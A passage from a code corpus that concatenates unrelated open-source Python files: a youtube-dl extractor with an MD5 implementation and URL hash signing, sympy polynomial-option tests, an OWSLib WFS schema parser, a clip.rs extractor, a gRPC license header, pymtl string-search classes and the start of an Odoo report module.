_loc_4 = cls.md5_ff(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 7], 22, -45705983)
_loc_3 = cls.md5_ff(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 8], 7, 1770035416)
_loc_6 = cls.md5_ff(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 9], 12, -1958414417)
_loc_5 = cls.md5_ff(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 10], 17, -42063)
_loc_4 = cls.md5_ff(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 11], 22, -1990404162)
_loc_3 = cls.md5_ff(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 12], 7, 1804603682)
_loc_6 = cls.md5_ff(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 13], 12, -40341101)
_loc_5 = cls.md5_ff(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 14], 17, -1502002290)
_loc_4 = cls.md5_ff(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 15], 22, 1236535329)
_loc_3 = cls.md5_gg(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 1], 5, -165796510)
_loc_6 = cls.md5_gg(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 6], 9, -1069501632)
_loc_5 = cls.md5_gg(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 11], 14, 643717713)
_loc_4 = cls.md5_gg(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 0], 20, -373897302)
_loc_3 = cls.md5_gg(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 5], 5, -701558691)
_loc_6 = cls.md5_gg(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 10], 9, 38016083)
_loc_5 = cls.md5_gg(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 15], 14, -660478335)
_loc_4 = cls.md5_gg(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 4], 20, -405537848)
_loc_3 = cls.md5_gg(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 9], 5, 568446438)
_loc_6 = cls.md5_gg(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 14], 9, -1019803690)
_loc_5 = cls.md5_gg(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 3], 14, -187363961)
_loc_4 = cls.md5_gg(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 8], 20, 1163531501)
_loc_3 = cls.md5_gg(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 13], 5, -1444681467)
_loc_6 = cls.md5_gg(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 2], 9, -51403784)
_loc_5 = cls.md5_gg(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 7], 14, 1735328473)
_loc_4 = cls.md5_gg(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 12], 20, -1926607734)
_loc_3 = cls.md5_hh(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 5], 4, -378558)
_loc_6 = cls.md5_hh(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 8], 11, -2022574463)
_loc_5 = cls.md5_hh(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 11], 16, 1839030562)
_loc_4 = cls.md5_hh(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 14], 23, -35309556)
_loc_3 = cls.md5_hh(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 1], 4, -1530992060)
_loc_6 = cls.md5_hh(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 4], 11, 1272893353)
_loc_5 = cls.md5_hh(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 7], 16, -155497632)
_loc_4 = cls.md5_hh(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 10], 23, -1094730640)
_loc_3 = cls.md5_hh(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 13], 4, 681279174)
_loc_6 = cls.md5_hh(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 0], 11, -358537222)
_loc_5 = cls.md5_hh(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 3], 16, -722521979)
_loc_4 = cls.md5_hh(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 6], 23, 76029189)
_loc_3 = cls.md5_hh(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 9], 4, -640364487)
_loc_6 = cls.md5_hh(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 12], 11, -421815835)
_loc_5 = cls.md5_hh(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 15], 16, 530742520)
_loc_4 = cls.md5_hh(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 2], 23, -995338651)
_loc_3 = cls.md5_ii(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 0], 6, -198630844)
_loc_6 = cls.md5_ii(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 7], 10, 1126891415)
_loc_5 = cls.md5_ii(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 14], 15, -1416354905)
_loc_4 = cls.md5_ii(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 5], 21, -57434055)
_loc_3 = cls.md5_ii(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 12], 6, 1700485571)
_loc_6 = cls.md5_ii(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 3], 10, -1894986606)
_loc_5 = cls.md5_ii(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 10], 15, -1051523)
_loc_4 = cls.md5_ii(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 1], 21, -2054922799)
_loc_3 = cls.md5_ii(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 8], 6, 1873313359)
_loc_6 = cls.md5_ii(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 15], 10, -30611744)
_loc_5 = cls.md5_ii(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 6], 15, -1560198380)
_loc_4 = cls.md5_ii(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 13], 21, 1309151649)
_loc_3 = cls.md5_ii(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 4], 6, -145523070)
_loc_6 = cls.md5_ii(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 11], 10, -1120210379)
_loc_5 = cls.md5_ii(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 2], 15, 718787259)
_loc_4 = cls.md5_ii(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 9], 21, -343485551)
_loc_3 = cls.safe_add(_loc_3, _loc_8)
_loc_4 = cls.safe_add(_loc_4, _loc_9)
_loc_5 = cls.safe_add(_loc_5, _loc_10)
_loc_6 = cls.safe_add(_loc_6, _loc_11)
return [_loc_3, _loc_4, _loc_5, _loc_6]
@classmethod
def md5_cmn(cls, param1, param2, param3, param4, param5, param6):
return cls.safe_add(
cls.bit_rol(cls.safe_add(cls.safe_add(param2, param1), cls.safe_add(param4, param6)), param5), param3)
@classmethod
def md5_ff(cls, param1, param2, param3, param4, param5, param6, param7):
return cls.md5_cmn(param2 & param3 | ~param2 & param4, param1, param2, param5, param6, param7)
@classmethod
def md5_gg(cls, param1, param2, param3, param4, param5, param6, param7):
return cls.md5_cmn(param2 & param4 | param3 & ~param4, param1, param2, param5, param6, param7)
@classmethod
def md5_hh(cls, param1, param2, param3, param4, param5, param6, param7):
return cls.md5_cmn(param2 ^ param3 ^ param4, param1, param2, param5, param6, param7)
@classmethod
def md5_ii(cls, param1, param2, param3, param4, param5, param6, param7):
return cls.md5_cmn(param3 ^ (param2 | ~param4), param1, param2, param5, param6, param7)
@classmethod
def safe_add(cls, param1, param2):
_loc_3 = (param1 & 65535) + (param2 & 65535)
_loc_4 = (param1 >> 16) + (param2 >> 16) + (_loc_3 >> 16)
return cls.lshift(_loc_4, 16) | _loc_3 & 65535
@classmethod
def bit_rol(cls, param1, param2):
return cls.lshift(param1, param2) | (param1 & 0xFFFFFFFF) >> (32 - param2)
@staticmethod
def lshift(value, count):
r = (0xFFFFFFFF & value) << count
return -(~(r - 1) & 0xFFFFFFFF) if r > 0x7FFFFFFF else r
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
video_id = self._search_regex(self._VIDEOID_REGEXES, webpage, 'video id')
video = self._download_json(
self._API_URL_TEMPLATE % video_id, video_id)['videos'][0]
title = video['title']
duration = float_or_none(video['duration'], 1000)
like_count = video['likes']
uploader = video['channel']
uploader_id = video['channel_id']
formats = []
for resource in video['resources']:
resource_id = resource.get('_id')
if not resource_id:
continue
security = self._download_json(
self._SECURITY_URL_TEMPLATE % (video_id, resource_id),
video_id, 'Downloading security hash for %s' % resource_id)
security_hash = security.get('hash')
if not security_hash:
message = security.get('message')
if message:
raise ExtractorError(
'%s returned error: %s' % (self.IE_NAME, message), expected=True)
continue
hash_code = security_hash[:2]
received_time = int(security_hash[2:12])
received_random = security_hash[12:22]
received_md5 = security_hash[22:]
sign_time = received_time + self._RESIGN_EXPIRATION
padding = '%010d' % random.randint(1, 10000000000)
signed_md5 = self.MD5.b64_md5(received_md5 + compat_str(sign_time) + padding)
signed_hash = hash_code + compat_str(received_time) + received_random + compat_str(sign_time) + padding + signed_md5
formats.append({
'url': '%s?h=%s&k=%s' % (resource['url'], signed_hash, 'flash'),
'format_id': resource_id,
'height': resource['height']
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'duration': duration,
'uploader': uploader,
'uploader_id': uploader_id,
'like_count': like_count,
'formats': formats
}
| unlicense |
NikNitro/Python-iBeacon-Scan | sympy/polys/tests/test_polyoptions.py | 38 | 11959 | """Tests for options manager for :class:`Poly` and public API functions. """
from sympy.polys.polyoptions import (
Options, Expand, Gens, Wrt, Sort, Order, Field, Greedy, Domain,
Split, Gaussian, Extension, Modulus, Symmetric, Strict, Auto,
Frac, Formal, Polys, Include, All, Gen, Symbols, Method)
from sympy.polys.orderings import lex
from sympy.polys.domains import FF, GF, ZZ, QQ, EX
from sympy.polys.polyerrors import OptionError, GeneratorsError
from sympy import Integer, Symbol, I, sqrt
from sympy.utilities.pytest import raises
from sympy.abc import x, y, z
def test_Options_clone():
opt = Options((x, y, z), {'domain': 'ZZ'})
assert opt.gens == (x, y, z)
assert opt.domain == ZZ
assert ('order' in opt) is False
new_opt = opt.clone({'gens': (x, y), 'order': 'lex'})
assert opt.gens == (x, y, z)
assert opt.domain == ZZ
assert ('order' in opt) is False
assert new_opt.gens == (x, y)
assert new_opt.domain == ZZ
assert ('order' in new_opt) is True
def test_Expand_preprocess():
assert Expand.preprocess(False) is False
assert Expand.preprocess(True) is True
assert Expand.preprocess(0) is False
assert Expand.preprocess(1) is True
raises(OptionError, lambda: Expand.preprocess(x))
def test_Expand_postprocess():
opt = {'expand': True}
Expand.postprocess(opt)
assert opt == {'expand': True}
def test_Gens_preprocess():
assert Gens.preprocess((None,)) == ()
assert Gens.preprocess((x, y, z)) == (x, y, z)
assert Gens.preprocess(((x, y, z),)) == (x, y, z)
a = Symbol('a', commutative=False)
raises(GeneratorsError, lambda: Gens.preprocess((x, x, y)))
raises(GeneratorsError, lambda: Gens.preprocess((x, y, a)))
def test_Gens_postprocess():
opt = {'gens': (x, y)}
Gens.postprocess(opt)
assert opt == {'gens': (x, y)}
def test_Wrt_preprocess():
assert Wrt.preprocess(x) == ['x']
assert Wrt.preprocess('') == []
assert Wrt.preprocess(' ') == []
assert Wrt.preprocess('x,y') == ['x', 'y']
assert Wrt.preprocess('x y') == ['x', 'y']
assert Wrt.preprocess('x, y') == ['x', 'y']
assert Wrt.preprocess('x , y') == ['x', 'y']
assert Wrt.preprocess(' x, y') == ['x', 'y']
assert Wrt.preprocess(' x, y') == ['x', 'y']
assert Wrt.preprocess([x, y]) == ['x', 'y']
raises(OptionError, lambda: Wrt.preprocess(','))
raises(OptionError, lambda: Wrt.preprocess(0))
def test_Wrt_postprocess():
opt = {'wrt': ['x']}
Wrt.postprocess(opt)
assert opt == {'wrt': ['x']}
def test_Sort_preprocess():
assert Sort.preprocess([x, y, z]) == ['x', 'y', 'z']
assert Sort.preprocess((x, y, z)) == ['x', 'y', 'z']
assert Sort.preprocess('x > y > z') == ['x', 'y', 'z']
assert Sort.preprocess('x>y>z') == ['x', 'y', 'z']
raises(OptionError, lambda: Sort.preprocess(0))
raises(OptionError, lambda: Sort.preprocess({x, y, z}))
def test_Sort_postprocess():
opt = {'sort': 'x > y'}
Sort.postprocess(opt)
assert opt == {'sort': 'x > y'}
def test_Order_preprocess():
assert Order.preprocess('lex') == lex
def test_Order_postprocess():
opt = {'order': True}
Order.postprocess(opt)
assert opt == {'order': True}
def test_Field_preprocess():
assert Field.preprocess(False) is False
assert Field.preprocess(True) is True
assert Field.preprocess(0) is False
assert Field.preprocess(1) is True
raises(OptionError, lambda: Field.preprocess(x))
def test_Field_postprocess():
opt = {'field': True}
Field.postprocess(opt)
assert opt == {'field': True}
def test_Greedy_preprocess():
assert Greedy.preprocess(False) is False
assert Greedy.preprocess(True) is True
assert Greedy.preprocess(0) is False
assert Greedy.preprocess(1) is True
raises(OptionError, lambda: Greedy.preprocess(x))
def test_Greedy_postprocess():
opt = {'greedy': True}
Greedy.postprocess(opt)
assert opt == {'greedy': True}
def test_Domain_preprocess():
assert Domain.preprocess(ZZ) == ZZ
assert Domain.preprocess(QQ) == QQ
assert Domain.preprocess(EX) == EX
assert Domain.preprocess(FF(2)) == FF(2)
assert Domain.preprocess(ZZ[x, y]) == ZZ[x, y]
assert Domain.preprocess('Z') == ZZ
assert Domain.preprocess('Q') == QQ
assert Domain.preprocess('ZZ') == ZZ
assert Domain.preprocess('QQ') == QQ
assert Domain.preprocess('EX') == EX
assert Domain.preprocess('FF(23)') == FF(23)
assert Domain.preprocess('GF(23)') == GF(23)
raises(OptionError, lambda: Domain.preprocess('Z[]'))
assert Domain.preprocess('Z[x]') == ZZ[x]
assert Domain.preprocess('Q[x]') == QQ[x]
assert Domain.preprocess('ZZ[x]') == ZZ[x]
assert Domain.preprocess('QQ[x]') == QQ[x]
assert Domain.preprocess('Z[x,y]') == ZZ[x, y]
assert Domain.preprocess('Q[x,y]') == QQ[x, y]
assert Domain.preprocess('ZZ[x,y]') == ZZ[x, y]
assert Domain.preprocess('QQ[x,y]') == QQ[x, y]
raises(OptionError, lambda: Domain.preprocess('Z()'))
assert Domain.preprocess('Z(x)') == ZZ.frac_field(x)
assert Domain.preprocess('Q(x)') == QQ.frac_field(x)
assert Domain.preprocess('ZZ(x)') == ZZ.frac_field(x)
assert Domain.preprocess('QQ(x)') == QQ.frac_field(x)
assert Domain.preprocess('Z(x,y)') == ZZ.frac_field(x, y)
assert Domain.preprocess('Q(x,y)') == QQ.frac_field(x, y)
assert Domain.preprocess('ZZ(x,y)') == ZZ.frac_field(x, y)
assert Domain.preprocess('QQ(x,y)') == QQ.frac_field(x, y)
assert Domain.preprocess('Q<I>') == QQ.algebraic_field(I)
assert Domain.preprocess('QQ<I>') == QQ.algebraic_field(I)
assert Domain.preprocess('Q<sqrt(2), I>') == QQ.algebraic_field(sqrt(2), I)
assert Domain.preprocess(
'QQ<sqrt(2), I>') == QQ.algebraic_field(sqrt(2), I)
raises(OptionError, lambda: Domain.preprocess('abc'))
def test_Domain_postprocess():
raises(GeneratorsError, lambda: Domain.postprocess({'gens': (x, y),
'domain': ZZ[y, z]}))
raises(GeneratorsError, lambda: Domain.postprocess({'gens': (),
'domain': EX}))
raises(GeneratorsError, lambda: Domain.postprocess({'domain': EX}))
def test_Split_preprocess():
assert Split.preprocess(False) is False
assert Split.preprocess(True) is True
assert Split.preprocess(0) is False
assert Split.preprocess(1) is True
raises(OptionError, lambda: Split.preprocess(x))
def test_Split_postprocess():
raises(NotImplementedError, lambda: Split.postprocess({'split': True}))
def test_Gaussian_preprocess():
assert Gaussian.preprocess(False) is False
assert Gaussian.preprocess(True) is True
assert Gaussian.preprocess(0) is False
assert Gaussian.preprocess(1) is True
raises(OptionError, lambda: Gaussian.preprocess(x))
def test_Gaussian_postprocess():
opt = {'gaussian': True}
Gaussian.postprocess(opt)
assert opt == {
'gaussian': True,
'extension': {I},
'domain': QQ.algebraic_field(I),
}
def test_Extension_preprocess():
assert Extension.preprocess(True) is True
assert Extension.preprocess(1) is True
assert Extension.preprocess([]) is None
assert Extension.preprocess(sqrt(2)) == {sqrt(2)}
assert Extension.preprocess([sqrt(2)]) == {sqrt(2)}
assert Extension.preprocess([sqrt(2), I]) == {sqrt(2), I}
raises(OptionError, lambda: Extension.preprocess(False))
raises(OptionError, lambda: Extension.preprocess(0))
def test_Extension_postprocess():
opt = {'extension': {sqrt(2)}}
Extension.postprocess(opt)
assert opt == {
'extension': {sqrt(2)},
'domain': QQ.algebraic_field(sqrt(2)),
}
opt = {'extension': True}
Extension.postprocess(opt)
assert opt == {'extension': True}
def test_Modulus_preprocess():
assert Modulus.preprocess(23) == 23
assert Modulus.preprocess(Integer(23)) == 23
raises(OptionError, lambda: Modulus.preprocess(0))
raises(OptionError, lambda: Modulus.preprocess(x))
def test_Modulus_postprocess():
opt = {'modulus': 5}
Modulus.postprocess(opt)
assert opt == {
'modulus': 5,
'domain': FF(5),
}
opt = {'modulus': 5, 'symmetric': False}
Modulus.postprocess(opt)
assert opt == {
'modulus': 5,
'domain': FF(5, False),
'symmetric': False,
}
def test_Symmetric_preprocess():
assert Symmetric.preprocess(False) is False
assert Symmetric.preprocess(True) is True
assert Symmetric.preprocess(0) is False
assert Symmetric.preprocess(1) is True
raises(OptionError, lambda: Symmetric.preprocess(x))
def test_Symmetric_postprocess():
opt = {'symmetric': True}
Symmetric.postprocess(opt)
assert opt == {'symmetric': True}
def test_Strict_preprocess():
assert Strict.preprocess(False) is False
assert Strict.preprocess(True) is True
assert Strict.preprocess(0) is False
assert Strict.preprocess(1) is True
raises(OptionError, lambda: Strict.preprocess(x))
def test_Strict_postprocess():
opt = {'strict': True}
Strict.postprocess(opt)
assert opt == {'strict': True}
def test_Auto_preprocess():
assert Auto.preprocess(False) is False
assert Auto.preprocess(True) is True
assert Auto.preprocess(0) is False
assert Auto.preprocess(1) is True
raises(OptionError, lambda: Auto.preprocess(x))
def test_Auto_postprocess():
opt = {'auto': True}
Auto.postprocess(opt)
assert opt == {'auto': True}
def test_Frac_preprocess():
assert Frac.preprocess(False) is False
assert Frac.preprocess(True) is True
assert Frac.preprocess(0) is False
assert Frac.preprocess(1) is True
raises(OptionError, lambda: Frac.preprocess(x))
def test_Frac_postprocess():
opt = {'frac': True}
Frac.postprocess(opt)
assert opt == {'frac': True}
def test_Formal_preprocess():
assert Formal.preprocess(False) is False
assert Formal.preprocess(True) is True
assert Formal.preprocess(0) is False
assert Formal.preprocess(1) is True
raises(OptionError, lambda: Formal.preprocess(x))
def test_Formal_postprocess():
opt = {'formal': True}
Formal.postprocess(opt)
assert opt == {'formal': True}
def test_Polys_preprocess():
assert Polys.preprocess(False) is False
assert Polys.preprocess(True) is True
assert Polys.preprocess(0) is False
assert Polys.preprocess(1) is True
raises(OptionError, lambda: Polys.preprocess(x))
def test_Polys_postprocess():
opt = {'polys': True}
Polys.postprocess(opt)
assert opt == {'polys': True}
def test_Include_preprocess():
assert Include.preprocess(False) is False
assert Include.preprocess(True) is True
assert Include.preprocess(0) is False
assert Include.preprocess(1) is True
raises(OptionError, lambda: Include.preprocess(x))
def test_Include_postprocess():
opt = {'include': True}
Include.postprocess(opt)
assert opt == {'include': True}
def test_All_preprocess():
assert All.preprocess(False) is False
assert All.preprocess(True) is True
assert All.preprocess(0) is False
assert All.preprocess(1) is True
raises(OptionError, lambda: All.preprocess(x))
def test_All_postprocess():
opt = {'all': True}
All.postprocess(opt)
assert opt == {'all': True}
def test_Gen_postprocess():
opt = {'gen': x}
Gen.postprocess(opt)
assert opt == {'gen': x}
def test_Symbols_preprocess():
raises(OptionError, lambda: Symbols.preprocess(x))
def test_Symbols_postprocess():
opt = {'symbols': [x, y, z]}
Symbols.postprocess(opt)
assert opt == {'symbols': [x, y, z]}
def test_Method_preprocess():
raises(OptionError, lambda: Method.preprocess(10))
def test_Method_postprocess():
opt = {'method': 'f5b'}
Method.postprocess(opt)
assert opt == {'method': 'f5b'}
| gpl-3.0 |
tomkralidis/OWSLib | owslib/feature/schema.py | 3 | 5536 | # =============================================================================
# OWSLib. Copyright (C) 2015 Jachym Cepicky
#
# Contact email: [email protected]
#
# =============================================================================
"""
Set of functions, which are suitable for DescribeFeatureType parsing and
generating layer schema description compatible with `fiona`
"""
import sys
from urllib.parse import urlencode, parse_qsl
from owslib.etree import etree
from owslib.namespaces import Namespaces
from owslib.util import which_etree, findall, Authentication, openURL
MYNS = Namespaces()
XS_NAMESPACE = MYNS.get_namespace("xs")
GML_NAMESPACES = (
MYNS.get_namespace("gml"),
MYNS.get_namespace("gml311"),
MYNS.get_namespace("gml32"),
)
def get_schema(
url, typename, version="1.0.0", timeout=30, headers=None, username=None, password=None, auth=None
):
"""Parses DescribeFeatureType response and creates schema compatible
with :class:`fiona`
:param str url: url of the service
:param str version: version of the service
:param str typename: name of the layer
:param int timeout: request timeout
:param str username: service authentication username
:param str password: service authentication password
:param Authentication auth: instance of owslib.util.Authentication
"""
if auth:
if username:
auth.username = username
if password:
auth.password = password
else:
auth = Authentication(username, password)
url = _get_describefeaturetype_url(url, version, typename)
root = _get_remote_describefeaturetype(url, timeout=timeout,
headers=headers, auth=auth)
if ":" in typename:
typename = typename.split(":")[1]
type_element = root.find("./{%s}element" % XS_NAMESPACE)
if type_element is None:
return None
complex_type = type_element.attrib["type"].split(":")[1]
elements = _get_elements(complex_type, root)
nsmap = None
if hasattr(root, "nsmap"):
nsmap = root.nsmap
return _construct_schema(elements, nsmap)
def _get_elements(complex_type, root):
"""Get attribute elements
"""
found_elements = []
element = findall(
root,
"{%s}complexType" % XS_NAMESPACE,
attribute_name="name",
attribute_value=complex_type,
)[0]
found_elements = findall(element, "{%s}element" % XS_NAMESPACE)
return found_elements
def _construct_schema(elements, nsmap):
"""Consruct fiona schema based on given elements
:param list Element: list of elements
:param dict nsmap: namespace map
:return dict: schema
"""
if elements is None:
return None
schema = {"properties": {}, "required": [], "geometry": None}
schema_key = None
gml_key = None
# if nsmap is defined, use it
if nsmap:
for key in nsmap:
if nsmap[key] == XS_NAMESPACE:
schema_key = key
if nsmap[key] in GML_NAMESPACES:
gml_key = key
# if no nsmap is defined, we have to guess
else:
gml_key = "gml"
schema_key = "xsd"
mappings = {
"PointPropertyType": "Point",
"PolygonPropertyType": "Polygon",
"LineStringPropertyType": "LineString",
"MultiPointPropertyType": "MultiPoint",
"MultiLineStringPropertyType": "MultiLineString",
"MultiPolygonPropertyType": "MultiPolygon",
"MultiGeometryPropertyType": "MultiGeometry",
"GeometryPropertyType": "GeometryCollection",
"SurfacePropertyType": "3D Polygon",
"MultiSurfacePropertyType": "3D MultiPolygon",
}
for element in elements:
data_type = element.attrib["type"].replace(gml_key + ":", "")
name = element.attrib["name"]
non_nillable = element.attrib.get("nillable", "false") == "false"
if data_type in mappings:
schema["geometry"] = mappings[data_type]
schema["geometry_column"] = name
else:
if schema_key is not None:
schema["properties"][name] = data_type.replace(schema_key + ":", "")
if non_nillable:
schema["required"].append(name)
if schema["properties"] or schema["geometry"]:
return schema
else:
return None
def _get_describefeaturetype_url(url, version, typename):
"""Get url for describefeaturetype request
:return str: url
"""
query_string = []
if url.find("?") != -1:
query_string = parse_qsl(url.split("?")[1])
params = [x[0] for x in query_string]
if "service" not in params:
query_string.append(("service", "WFS"))
if "request" not in params:
query_string.append(("request", "DescribeFeatureType"))
if "version" not in params:
query_string.append(("version", version))
query_string.append(("typeName", typename))
urlqs = urlencode(tuple(query_string))
return url.split("?")[0] + "?" + urlqs
def _get_remote_describefeaturetype(url, timeout, headers, auth):
"""Gets the DescribeFeatureType response from the remote server.
:param str url: url of the service
:param int timeout: request timeout
:param Authentication auth: instance of owslib.util.Authentication
:return etree.Element with the root of the DescribeFeatureType response
"""
res = openURL(url, timeout=timeout, headers=headers, auth=auth)
return etree.fromstring(res.read())
| bsd-3-clause |
steebchen/youtube-dl | youtube_dl/extractor/cliprs.py | 81 | 1030 | # coding: utf-8
from __future__ import unicode_literals
from .onet import OnetBaseIE
class ClipRsIE(OnetBaseIE):
_VALID_URL = r'https?://(?:www\.)?clip\.rs/(?P<id>[^/]+)/\d+'
_TEST = {
'url': 'http://www.clip.rs/premijera-frajle-predstavljaju-novi-spot-za-pesmu-moli-me-moli/3732',
'md5': 'c412d57815ba07b56f9edc7b5d6a14e5',
'info_dict': {
'id': '1488842.1399140381',
'ext': 'mp4',
'title': 'PREMIJERA Frajle predstavljaju novi spot za pesmu Moli me, moli',
'description': 'md5:56ce2c3b4ab31c5a2e0b17cb9a453026',
'duration': 229,
'timestamp': 1459850243,
'upload_date': '20160405',
}
}
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
mvp_id = self._search_mvp_id(webpage)
info_dict = self._extract_from_id(mvp_id, webpage)
info_dict['display_id'] = display_id
return info_dict
| unlicense |
VcamX/grpc | src/python/grpcio/tests/unit/_junkdrawer/__init__.py | 1496 | 1530 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| bsd-3-clause |
Abhinav117/pymtl | accel/strsearch/StrSearchOO.py | 7 | 2441 | #=========================================================================
# StrSearchOO.py
#=========================================================================
#-------------------------------------------------------------------------
# StrSearchMath
#-------------------------------------------------------------------------
# Simple python string searcher.
class StrSearchMath( object ):
#-----------------------------------------------------------------------
# __init__
#-----------------------------------------------------------------------
def __init__( self, string ):
self.string = string
#-----------------------------------------------------------------------
# find
#-----------------------------------------------------------------------
def find( self, doc ):
return self.string in doc
#-------------------------------------------------------------------------
# StrSearchAlg
#-------------------------------------------------------------------------
# Knuth-Morris-Pratt algorithm.
class StrSearchAlg( object ):
#-----------------------------------------------------------------------
# __init__
#-----------------------------------------------------------------------
def __init__( self, string ):
self.re = re = string
self.DFA = DFA = (len(re) + 1) * [0]
# build the deterministic finite-state automaton
i = 0
DFA[0] = -1
while i < len(re):
DFA[i+1] = DFA[i] + 1
while (DFA[i+1] > 0 and re[i] != re[DFA[i+1] - 1]):
DFA[i+1] = DFA[DFA[i+1] - 1] + 1
i+=1
#-----------------------------------------------------------------------
# __init__
#-----------------------------------------------------------------------
def find( self, doc ):
index = 0
j = 0
while j < len(doc):
# if character not a match, rewind the DFA
#while (index > 0 and doc[j] != re[index]):
if (index > 0 and doc[j] != self.re[index]):
index = self.DFA[index]
# check if this character matches our current search
if (doc[j] == self.re[index]):
index += 1
# we found a match! now check for overlapping matches
if index == (len(self.re)):
index = self.DFA[index]
#print ("FOUND: "+doc[:j+1-len(self.re)]+"|"
# +doc[j+1-len(self.re):j+1]+"|"+doc[j+1:])
return True
# increment the doc indice
j += 1
return False
| bsd-3-clause |
shingonoide/odoo | addons/point_of_sale/report/pos_invoice.py | 317 | 2393 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
from openerp.tools.translate import _
class PosInvoiceReport(osv.AbstractModel):
_name = 'report.point_of_sale.report_invoice'
